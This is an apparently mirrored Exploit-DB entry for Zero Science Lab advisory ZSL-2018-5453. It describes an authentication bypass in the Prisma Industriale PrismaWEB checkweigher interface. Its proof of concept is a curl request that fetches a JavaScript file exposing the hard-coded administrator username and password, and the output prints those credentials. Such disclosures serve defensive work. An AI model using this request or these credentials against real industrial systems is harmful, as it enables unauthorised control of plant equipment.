bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/44276.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

36 lines
No EOL
1.1 KiB
Text
Raw Blame History

Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass
Vendor: Prisma Industriale S.r.l.
Product web page: https://www.prismaindustriale.com
Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??)
Summary: Web Administration of Machine.
Desc: The vulnerability exists due to the disclosure of hard-coded credentials allowing
an attacker to effectively bypass authentication of PrismaWEB with administrator
privileges. The credentials can be disclosed by simply navigating to the login_par.js
JavaScript page that holds the username and password for the management interface that
are being used via the Login() function in /scripts/functions_cookie.js script.
Tested on: HMS AnyBus-S WebServer
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5453
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
06.02.2018
---
$ curl http://10.10.10.70/user/scripts/login_par.js
// JavaScript Document
// 11 Dicembre 2009 Release 1.0 Rev.10
var txtChkUser = "prismaweb"; // Nome utente Login
var txtChkPassword = "prisma"; // Password Login
Reference in a new issue View git blame Copy permalink